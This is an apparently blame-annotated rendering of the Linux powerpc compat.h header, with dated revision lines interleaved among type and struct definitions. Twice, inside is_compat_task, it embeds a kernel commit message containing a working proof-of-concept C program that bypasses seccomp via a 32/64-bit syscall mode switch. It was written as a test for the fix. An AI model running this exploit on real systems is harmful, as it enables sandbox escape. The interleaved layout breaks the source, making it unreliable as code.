2005-11-09 05:38:01 +03:00
# ifndef _ASM_POWERPC_COMPAT_H
# define _ASM_POWERPC_COMPAT_H
2005-12-17 00:43:46 +03:00
# ifdef __KERNEL__
2005-04-17 02:20:36 +04:00
/*
* Architecture specific compatibility types
*/
# include <linux/types.h>
# include <linux/sched.h>
2010-03-11 02:21:19 +03:00
# define COMPAT_USER_HZ 100
# define COMPAT_UTS_MACHINE "ppc\0\0"
2005-04-17 02:20:36 +04:00
typedef u32 compat_size_t ;
typedef s32 compat_ssize_t ;
typedef s32 compat_time_t ;
typedef s32 compat_clock_t ;
typedef s32 compat_pid_t ;
2005-09-07 02:16:40 +04:00
typedef u32 __compat_uid_t ;
typedef u32 __compat_gid_t ;
typedef u32 __compat_uid32_t ;
typedef u32 __compat_gid32_t ;
2005-04-17 02:20:36 +04:00
typedef u32 compat_mode_t ;
typedef u32 compat_ino_t ;
typedef u32 compat_dev_t ;
typedef s32 compat_off_t ;
typedef s64 compat_loff_t ;
typedef s16 compat_nlink_t ;
typedef u16 compat_ipc_pid_t ;
typedef s32 compat_daddr_t ;
typedef u32 compat_caddr_t ;
typedef __kernel_fsid_t compat_fsid_t ;
typedef s32 compat_key_t ;
2005-06-23 11:10:14 +04:00
typedef s32 compat_timer_t ;
2005-04-17 02:20:36 +04:00
typedef s32 compat_int_t ;
typedef s32 compat_long_t ;
2007-07-16 10:41:11 +04:00
typedef s64 compat_s64 ;
2005-04-17 02:20:36 +04:00
typedef u32 compat_uint_t ;
typedef u32 compat_ulong_t ;
2007-07-16 10:41:11 +04:00
typedef u64 compat_u64 ;
2012-10-05 04:15:31 +04:00
typedef u32 compat_uptr_t ;
2005-04-17 02:20:36 +04:00
struct compat_timespec {
compat_time_t tv_sec ;
s32 tv_nsec ;
} ;
struct compat_timeval {
compat_time_t tv_sec ;
s32 tv_usec ;
} ;
struct compat_stat {
compat_dev_t st_dev ;
compat_ino_t st_ino ;
compat_mode_t st_mode ;
2005-11-09 05:38:01 +03:00
compat_nlink_t st_nlink ;
2005-09-07 02:16:40 +04:00
__compat_uid32_t st_uid ;
__compat_gid32_t st_gid ;
2005-04-17 02:20:36 +04:00
compat_dev_t st_rdev ;
compat_off_t st_size ;
compat_off_t st_blksize ;
compat_off_t st_blocks ;
compat_time_t st_atime ;
u32 st_atime_nsec ;
compat_time_t st_mtime ;
u32 st_mtime_nsec ;
compat_time_t st_ctime ;
u32 st_ctime_nsec ;
u32 __unused4 [ 2 ] ;
} ;
struct compat_flock {
short l_type ;
short l_whence ;
compat_off_t l_start ;
compat_off_t l_len ;
compat_pid_t l_pid ;
} ;
# define F_GETLK64 12 /* using 'struct flock64' */
# define F_SETLK64 13
# define F_SETLKW64 14
struct compat_flock64 {
short l_type ;
short l_whence ;
compat_loff_t l_start ;
compat_loff_t l_len ;
compat_pid_t l_pid ;
} ;
struct compat_statfs {
int f_type ;
int f_bsize ;
int f_blocks ;
int f_bfree ;
int f_bavail ;
int f_files ;
int f_ffree ;
compat_fsid_t f_fsid ;
int f_namelen ; /* SunOS ignores this field. */
int f_frsize ;
2011-10-18 00:40:02 +04:00
int f_flags ;
int f_spare [ 4 ] ;
2005-04-17 02:20:36 +04:00
} ;
# define COMPAT_RLIM_OLD_INFINITY 0x7fffffff
# define COMPAT_RLIM_INFINITY 0xffffffff
typedef u32 compat_old_sigset_t ;
# define _COMPAT_NSIG 64
# define _COMPAT_NSIG_BPW 32
typedef u32 compat_sigset_word ;
2012-10-05 04:15:31 +04:00
typedef union compat_sigval {
compat_int_t sival_int ;
compat_uptr_t sival_ptr ;
} compat_sigval_t ;
# define SI_PAD_SIZE32 (128 / sizeof(int) - 3)
typedef struct compat_siginfo {
int si_signo ;
int si_errno ;
int si_code ;
union {
int _pad [ SI_PAD_SIZE32 ] ;
/* kill() */
struct {
compat_pid_t _pid ; /* sender's pid */
__compat_uid_t _uid ; /* sender's uid */
} _kill ;
/* POSIX.1b timers */
struct {
compat_timer_t _tid ; /* timer id */
int _overrun ; /* overrun count */
compat_sigval_t _sigval ; /* same as below */
int _sys_private ; /* not to be passed to user */
} _timer ;
/* POSIX.1b signals */
struct {
compat_pid_t _pid ; /* sender's pid */
__compat_uid_t _uid ; /* sender's uid */
compat_sigval_t _sigval ;
} _rt ;
/* SIGCHLD */
struct {
compat_pid_t _pid ; /* which child */
__compat_uid_t _uid ; /* sender's uid */
int _status ; /* exit code */
compat_clock_t _utime ;
compat_clock_t _stime ;
} _sigchld ;
/* SIGILL, SIGFPE, SIGSEGV, SIGBUS, SIGEMT */
struct {
unsigned int _addr ; /* faulting insn/memory ref. */
} _sigfault ;
/* SIGPOLL */
struct {
int _band ; /* POLL_IN, POLL_OUT, POLL_MSG */
int _fd ;
} _sigpoll ;
} _sifields ;
} compat_siginfo_t ;
2005-04-17 02:20:36 +04:00
# define COMPAT_OFF_T_MAX 0x7fffffff
# define COMPAT_LOFF_T_MAX 0x7fffffffffffffffL
/*
* A pointer passed in from user mode . This should not
* be used for syscall parameters , just declare them
* as pointers because the syscall entry code will have
2008-02-03 17:32:51 +03:00
* appropriately converted them already .
2005-04-17 02:20:36 +04:00
*/
static inline void __user * compat_ptr ( compat_uptr_t uptr )
{
return ( void __user * ) ( unsigned long ) uptr ;
}
2006-02-01 13:28:09 +03:00
static inline compat_uptr_t ptr_to_compat ( void __user * uptr )
{
return ( u32 ) ( unsigned long ) uptr ;
}
2010-09-08 03:16:18 +04:00
static inline void __user * arch_compat_alloc_user_space ( long len )
2005-04-17 02:20:36 +04:00
{
struct pt_regs * regs = current - > thread . regs ;
unsigned long usp = regs - > gpr [ 1 ] ;
/*
2011-03-31 05:57:33 +04:00
* We can ' t access below the stack pointer in the 32 bit ABI and
2005-04-17 02:20:36 +04:00
* can access 288 bytes in the 64 bit ABI
*/
2010-08-27 07:49:11 +04:00
if ( ! is_32bit_task ( ) )
2005-04-17 02:20:36 +04:00
usp - = 288 ;
return ( void __user * ) ( usp - len ) ;
}
/*
* ipc64_perm is actually 32 / 64 bit clean but since the compat layer refers to
* it we may as well define it .
*/
struct compat_ipc64_perm {
compat_key_t key ;
2005-09-07 02:16:40 +04:00
__compat_uid_t uid ;
__compat_gid_t gid ;
__compat_uid_t cuid ;
__compat_gid_t cgid ;
2005-04-17 02:20:36 +04:00
compat_mode_t mode ;
unsigned int seq ;
unsigned int __pad2 ;
unsigned long __unused1 ; /* yes they really are 64bit pads */
unsigned long __unused2 ;
} ;
struct compat_semid64_ds {
struct compat_ipc64_perm sem_perm ;
unsigned int __unused1 ;
compat_time_t sem_otime ;
unsigned int __unused2 ;
compat_time_t sem_ctime ;
compat_ulong_t sem_nsems ;
compat_ulong_t __unused3 ;
compat_ulong_t __unused4 ;
} ;
struct compat_msqid64_ds {
struct compat_ipc64_perm msg_perm ;
unsigned int __unused1 ;
compat_time_t msg_stime ;
unsigned int __unused2 ;
compat_time_t msg_rtime ;
unsigned int __unused3 ;
compat_time_t msg_ctime ;
compat_ulong_t msg_cbytes ;
compat_ulong_t msg_qnum ;
compat_ulong_t msg_qbytes ;
compat_pid_t msg_lspid ;
compat_pid_t msg_lrpid ;
compat_ulong_t __unused4 ;
compat_ulong_t __unused5 ;
} ;
struct compat_shmid64_ds {
struct compat_ipc64_perm shm_perm ;
unsigned int __unused1 ;
compat_time_t shm_atime ;
unsigned int __unused2 ;
compat_time_t shm_dtime ;
unsigned int __unused3 ;
compat_time_t shm_ctime ;
unsigned int __unused4 ;
compat_size_t shm_segsz ;
compat_pid_t shm_cpid ;
compat_pid_t shm_lpid ;
compat_ulong_t shm_nattch ;
compat_ulong_t __unused5 ;
compat_ulong_t __unused6 ;
} ;
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 10:25:54 +03:00
static inline int is_compat_task ( void )
{
2010-08-27 07:49:11 +04:00
return is_32bit_task ( ) ;
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 10:25:54 +03:00
}
2005-12-17 00:43:46 +03:00
# endif /* __KERNEL__ */
2005-11-09 05:38:01 +03:00
# endif /* _ASM_POWERPC_COMPAT_H */
